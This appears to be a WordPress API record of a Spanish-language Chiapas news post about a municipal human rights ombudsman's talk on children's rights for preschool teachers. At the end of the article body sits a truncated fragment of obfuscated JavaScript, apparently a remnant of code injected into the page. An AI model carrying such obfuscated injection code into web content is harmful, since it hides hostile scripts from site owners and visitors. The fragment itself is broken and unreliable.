{"id":9770,"date":"2023-04-27T03:45:30","date_gmt":"2023-04-27T03:45:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9770"},"modified":"2023-04-27T03:45:30","modified_gmt":"2023-04-27T03:45:30","slug":"participan-escuelas-en-platicas-sobre-derechos-humanos-y-de-la-ninez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9770","title":{"rendered":"Participan escuelas en pl\u00e1ticas sobre derechos humanos y de la ni\u00f1ez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-26-at-5.01.04-PM-1-1024x576.jpeg\" alt=\"\" class=\"wp-image-9771\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-26-at-5.01.04-PM-1-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-26-at-5.01.04-PM-1-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-26-at-5.01.04-PM-1-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-26-at-5.01.04-PM-1-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-26-at-5.01.04-PM-1.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>26 de Abril del 2023. San Crist\u00f3bal de Las Casas.- La Defensor\u00eda Municipal de los Derechos Humanos llev\u00f3 a cabo la pl\u00e1tica sobre derechos humanos de las ni\u00f1as, ni\u00f1os y adolescentes y el inter\u00e9s superior de la ni\u00f1ez, ante profesores del Sector 03 de Educaci\u00f3n Preescolar.<\/p>\n\n\n\n<p>Al respecto, Mercedes Alejandra Villafuerte Castellanos, Defensora Municipal, coment\u00f3 que el inter\u00e9s superior de la ni\u00f1ez es un principio establecido en la Constituci\u00f3n Pol\u00edtica, en la Ley General de Derechos de Ni\u00f1as, Ni\u00f1os y Adolescentes y en la Convenci\u00f3n sobre los Derechos del Ni\u00f1o.<\/p>\n\n\n\n<p>\u201cEl Inter\u00e9s Superior de la ni\u00f1ez es un principio jur\u00eddico amplio que tiene al menos dos grandes conceptos: por un lado, es un derecho que tienen todas las ni\u00f1as, ni\u00f1os y adolescentes de ser considerados prioridad en las acciones o decisiones que les afecten en lo individual o en grupo; por otro lado, es una obligaci\u00f3n de todas las instancias p\u00fablicas y privadas tomarlo como base en las medidas que adopten e impacten a este grupo de la poblaci\u00f3n&#8221;, indic\u00f3.<\/p>\n\n\n\n<p>Villafuerte Castellanos, respondi\u00f3 diversas dudas realizadas por las profesoras y profesores relacionadas a problem\u00e1ticas respectivas con los derechos humanos de las ni\u00f1as y ni\u00f1os, brindando una asesor\u00eda legal a los participantes de esta pl\u00e1tica.<\/p>\n\n\n\n<p>Finalmente, la Defensora Municipal de los Derechos Humanos agradeci\u00f3 a Mar\u00eda de los \u00c1ngeles Velasco Gordillo, Jefa del Departamento de Educaci\u00f3n Preescolar y a la Maestra Esperanza Araceli de la Cruz Aguilar, Jefa del Sector 03 de Educaci\u00f3n Preescolar, por las facilidades y el apoyo brindado para poder llevar a cabo esta actividad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 26 de Abril del 2023. San Crist\u00f3bal de Las Casas.- La Defensor\u00eda Municipal de los Derechos Humanos llev\u00f3 a cabo la pl\u00e1tica sobre derechos humanos de las ni\u00f1as, ni\u00f1os y adolescentes y el inter\u00e9s superior de la ni\u00f1ez, ante profesores del Sector 03 de Educaci\u00f3n Preescolar. Al respecto, Mercedes Alejandra Villafuerte Castellanos, Defensora &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9771,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9770","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9770","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9770"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9770\/revisions"}],"predecessor-version":[{"id":9772,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9770\/revisions\/9772"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9771"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9770"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9770"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9770"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}